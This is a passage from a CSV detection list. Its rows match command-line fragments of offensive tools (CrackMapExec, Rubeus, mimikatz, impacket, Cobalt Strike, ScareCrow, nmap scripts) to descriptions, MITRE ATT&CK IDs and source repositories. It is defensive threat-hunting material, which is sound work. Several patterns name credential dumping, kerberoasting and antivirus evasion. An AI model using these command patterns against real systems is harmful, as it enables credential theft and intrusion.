","Frameworks","https://github.com/EmpireProject/Empire","1","0","Find-Fruit.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* riak-http-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* --rid-brute 2>&1 *.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* --rid-brute*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* rid-hijack -*","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","N/A","8","790","98","2023-07-31T03:58:14Z","2023-04-04T06:24:07Z" +"* -rl 4 -ta 8 -t 2100 -an AS8560*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" +"* rlogin-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* rmi-dumpregistry.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* rmi-vuln-classloader.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* rockyou.txt *","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* --rogue-smbserver-ip *","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" +"* --rogue-smbserver-share *","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" +"* ropbuffers.go*","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1102.001 - T1201.001 - T1570.002","TA0006","N/A","N/A","Exploitation tools","https://github.com/sensepost/ruler","1","0","N/A","N/A","10","1994","353","2021-02-19T09:28:07Z","2016-08-18T15:05:13Z" +"* ropfuscator*","offensive_tool_keyword","ropfuscator","ROPfuscator is a fine-grained code obfuscation framework for C/C++ programs using ROP (return-oriented programming).","T1090 - T1027 - T1055 - T1099 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/ropfuscator/ropfuscator","1","0","N/A","N/A","4","375","30","2023-08-11T00:41:55Z","2021-11-16T18:13:57Z" +"* rpcap-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* rpcap-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* rpc-grind.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* rpcinfo.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* rsa-vuln-roca.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* rsync-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* rsync-list-modules.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* rtsp-methods.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* rtsp-url-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* -Rubeus -Command *kerberoast*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"* ruler.exe*","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1102.001 - T1201.001 - T1570.002","TA0006","N/A","N/A","Exploitation tools","https://github.com/sensepost/ruler","1","0","N/A","N/A","10","1994","353","2021-02-19T09:28:07Z","2016-08-18T15:05:13Z" +"* --rules:Jumbo *","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* run donpapi*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" +"* RunasCs.cs*","offensive_tool_keyword","RunasCs","RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential","T1055 - T1134.001","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","0","N/A","N/A","8","722","107","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" +"* -runaslsass*","offensive_tool_keyword","GIUDA","Ask a TGS on behalf of another user without password","T1558.003 - T1059.003","TA0006 - TA0002","N/A","N/A","Exploitation tools","https://github.com/foxlox/GIUDA","1","0","N/A","9","4","388","50","2023-09-28T15:54:16Z","2023-07-19T15:37:07Z" +"* rusers.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* rustbof *","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files (BOFs) written in rust with rust core and alloc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/wumb0/rust_bof","1","0","N/A","10","10","189","22","2023-03-03T22:53:02Z","2022-02-28T23:46:00Z" +"* rusthound.exe*","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","AD Enumeration","https://github.com/OPENCYBER-FR/RustHound","1","0","N/A","9","7","676","56","2023-08-31T08:35:38Z","2022-10-12T05:54:35Z" +"* -s * -c command_exec --execute *","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","189","30","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" +"* -s * -c disable_wdigest *","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","189","30","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" +"* -s * -c disable_winrm *","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","189","30","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" +"* -s * -c enable_wdigest *","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","189","30","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" +"* -s * -c enable_winrm *","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","189","30","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" +"* -s * -c remote_posh *","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","189","30","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" +"* -s * --method 1 --function shell_exec --parameters cmd:id*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* -s *ascii* -b *reverse*invoke-expression*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","0","N/A","10","10","1188","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" +"* -s putty.exe_sig *","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10",,"N/A",,, +"*' s::l '*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"* s4u * /bronzebit*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* s4u * /nopac*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* s4u * /ticket:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* s4u *.kirbi*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* s4u */rc4:* ","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* s7-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* -sam * -system * -security * LOCAL > *.out*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"* samba-vuln-cve-2012-1182.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* -SauronEye -Command *","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"* -save-old -dc-ip *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -sc GetSyscallStub *","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10",,"N/A",,, +"* -sc SysWhispers3*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10",,"N/A",,, +"* -sc trustdump*","greyware_tool_keyword","adfind","Adfind is a command-line tool often used by administrators for Active Directory queries. However. attackers can misuse it to gather valuable information about the network environment. including user accounts. group memberships. domain controllers. and domain trusts. This gathered intelligence can aid in lateral movement. privilege escalation. or even data exfiltration. Such reconnaissance activities often precede more damaging attacks.","T1018 - T1027 - T1046 - T1057 - T1069 - T1087 - T1098 - T1482","TA0001 - TA0002 - TA0003 - TA0007 - TA0011","SolarWinds Compromise","FIN6 - FIN7 - APT29 - Wizard Spider - TA505 - menuPass","Reconnaissance","https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* scan * --dc-ip *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* scan --github-org*","offensive_tool_keyword","noseyparker","Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.","T1583 - T1059.001 - T1059.003","TA0002 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/praetorian-inc/noseyparker","1","1","N/A","8","10","1169","56","2023-09-25T21:13:22Z","2022-11-08T23:09:17Z" +"* scan --github-user*","offensive_tool_keyword","noseyparker","Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.","T1583 - T1059.001 - T1059.003","TA0002 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/praetorian-inc/noseyparker","1","1","N/A","8","10","1169","56","2023-09-25T21:13:22Z","2022-11-08T23:09:17Z" +"* -Scan -ScanType 3 -File * -DisableRemediation -Trace -Level 0x10*","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","0","N/A","N/A","8","781","86","2023-04-04T03:06:16Z","2020-10-08T11:22:26Z" +"* --scan-local-shares * -e *","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","0","N/A","9","7","651","79","2023-07-28T09:35:30Z","2021-05-31T19:46:57Z" +"* ScareCrow.go*","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","0","N/A","10","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" +"* ScareCrow.go*","offensive_tool_keyword","cobaltstrike","Cobalt Strike script for ScareCrow payloads intergration (EDR/AV evasion)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GeorgePatsias/ScareCrow-CobaltStrike","1","0","N/A","10","10","438","68","2022-07-15T09:39:18Z","2021-06-24T10:04:01Z" +"* -ScheduledTask -OnIdle *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - 